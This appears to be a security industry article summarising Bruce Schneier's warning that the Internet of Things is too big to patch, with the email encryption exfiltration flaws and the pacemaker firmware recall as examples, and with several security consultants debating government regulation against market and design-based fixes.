The Internet of Things (IoT) will never be too big to fail, although it is hard to conceive of the entire thing failing at once, unless every power grid on the planet goes down simultaneously.
But it is in danger of increasing incremental failure because it is too big to patch, according to author, encryption guru, and premier blogger Bruce Schneier.
Schneier, CTO of IBM Resilient Systems, wrote a post this past June mainly focused on the disclosure of serious flaws in encryption standards OpenPGP and S/MIME, which are used by numerous email clients to keep communications private.
Proof of Concept for IoT vulnerabilities
A team of researchers had published a proof of concept that they could trick any of those vulnerable clients by altering an email sent to it, resulting in a plaintext copy of the email sent to a server controlled by an attacker.
One reason it’s a serious problem is that dozens of email clients were using a standard that has been around for nearly three decades. The researchers said they found that plaintext exfiltration channels existed for 25 of the 35 tested S/MIME email clients and 10 of the 28 tested with OpenPGP.
The other reason is that vulnerable people – journalists, political dissidents in repressive regimes, whistleblowers, and human rights advocates – rely on those clients to protect their privacy, and therefore their personal safety.
And it is all going to take a while to fix since, as Schneier put it, it involves multiple, “communities without clear ownership.”
“In this case, there's nothing wrong with PGP or S/MIME in and of themselves,” he wrote. “Rather, the vulnerability occurs because of the way many email programs handle encrypted email.”
Which led Schneier to what he sees as a much bigger problem, given that, “the Internet is shifting from a set of systems we deliberately use – our phones and computers – to a fully immersive Internet-of-Things world that we live in 24/7 … (where) vulnerabilities will emerge through the interactions of different systems.”
It also suffers, he said, from many vendors not even having the expertise and capability to patch the software in what they sell, because it is frequently designed by, “offshore teams that come together, create the software, and then disband …”
Many devices, he noted, aren’t patchable at all – the only way to “fix” a digital video recorder that is vulnerable to being conscripted as part of a botnet is to, “throw it away and buy a new one.”
Or, an example with a much higher risk to personal safety was the notice about a year ago from the federal Food and Drug Administration that 465,000 implantable cardiac pacemakers from Abbott (formerly St. Jude Medical) needed a firmware update to prevent an attacker from doing things like depleting the battery or causing “inappropriate pacing.”
The FDA said it would only take three minutes to update the firmware, but it couldn’t be done remotely – it required a visit to a doctor’s office – something that might not be quickly accessible for every patient.
Beyond that is the continuing explosive growth of the IoT – Intel has estimated that by 2020 – less than two years away – there will be more than 200 billion connected devices in use.
“Patching is starting to fail, which means that we're losing the best mechanism we have for improving software security at exactly the same time that software is gaining autonomy and physical agency,” he wrote.
Which raises the obvious question: What should IoT developers, manufacturers, and the software security industry do about it?
Schneier’s view is well known. He has testified before Congress in favour of government mandates for basic security standards for IoT devices because, as he as written on his blog numerous times, the market won’t do it. “It’s hard to see any other viable alternative (than government intervention),” he wrote.
That gets mixed reviews from other security experts, in part because not everybody shares such a bleak view of the current state of the IoT.
Zach Lanier, principal research consultant with Atredis Partners, says he doesn’t think the situation is as ominous as Schneier does, but agrees that “the gap between ‘patchability’ of disparate components – from overall firmware to specific components like OS/RTOS, drivers, applications, etc. – is very wide and may certainly be growing, especially with the introduction of niche IoT vendors and their respective devices.”
But Jesse Victors, a security consultant with the Synopsys Software Integrity Group, said it simply isn’t the case that every, or even most, devices are built by a team that disbands as soon as it has completed a project.
“I disagree with the premise,” he said. “I see the emergence of IoT devices managed by well-known companies, such as Samsung, Nest, Tesla, Apple, Google, or Amazon. These companies have dedicated teams to their IoT infrastructure, respond to security researchers, and push updates on their own initiative or when pressured to do so.”
And regarding the design flaws in OpenPGP and S/MIME, Larry Trowell, associate principal consultant with Synopsys Software Integrity Group, said while, “patching the lack of authenticated encryption in the design at this stage would be a herculean task,” that the problem can be avoided simply by not using it, “in tangent with an automated software retrieval process, but for manual file verification and signature checks.
“Sometimes pieces of software just don’t work correctly together,” he said.
And neither Victors nor Trowell think government regulation and oversight will fix the security problems that ail the IoT.
Indeed, the federal government has a poor track record securing its own data, never mind devices. Just two examples are the breach of the Office of Personnel Management (OPM), discovered in 2014, and the compromise of National Security Agency (NSA) hacking tools in 2016.
“Government certification does not work for making cryptographic libraries secure,” Victors said, “and it will be equally ineffective for IoT security.”
He said he has seen proposals for federal certification bodies, “but I foresee them falling behind in technical understanding, not adapting to new technologies and connectivity relationships, encouraging IoT manufacturers to hide infrastructure, or generally being toothless.”
Trowell added that government involvement could, “infringe on the right to repair and the ability to tinker with devices.”
And Victors believes there are other, and better, “viable alternatives” to government regulation.
He said an independent, consumer-friendly organization could rank IoT devices in areas like, “whether it transmits user data overseas, whether it self-applies firmware updates, whether it is exposed to the public Internet, whether the company is maintaining it, and so on.”
A body like that, he added, could also coordinate the sometimes contentious relationship between security researchers and vendors when it comes to reporting the discovery of vulnerabilities.
Of course, a majority of the security failures that plague the IoT could be avoided by “building security in” to products from the start of the design phase throughout the development lifecycle.
But even that wouldn’t eliminate every vulnerability. Lanier said it will likely take a systemic overhaul. It’s not just vendors and developers who need security expertise, but platform manufacturers and service operators do as well.
“In some cases, they do provide sane and secure defaults, security features, appropriate feedback mechanisms for when something is ‘not okay,’ and robust, usable software/firmware update mechanisms,” he said.
“I don't know that there's really a clear answer on how to fix this en masse, but the IoT-device-du-jour building on a platform/stack that "doesn't suck" is a good start.”
Victors agrees that IoT devices must be designed to allow firmware upgrades easily – which is not the case in most WiFi routers in use today.
A huge percentage of them, “are rarely upgraded; their owners are not aware or not technically savvy enough to perform the upgrade, or the device itself cannot download the patches and upgrade itself.
“This absolutely needs to change,” he said. “We cannot assume that the first production version will be sufficient over the long term.”
Trowell’s view is that even though the market hasn’t fixed the problem yet, it remains the only viable way to do it. “I don’t think one country or one government mandating the fix is going to do much,” he said. “I think it will only change when the majority of consumers care and demand it.”
Will that happen? Lanier is dubious along with Schneier. “Outside of clued-in organizations or enterprises that actually do some kind of risk analysis on random IoT devices being introduced into their networks, I don't see most end users – consumers – really making security-conscious decisions any time soon,” he said.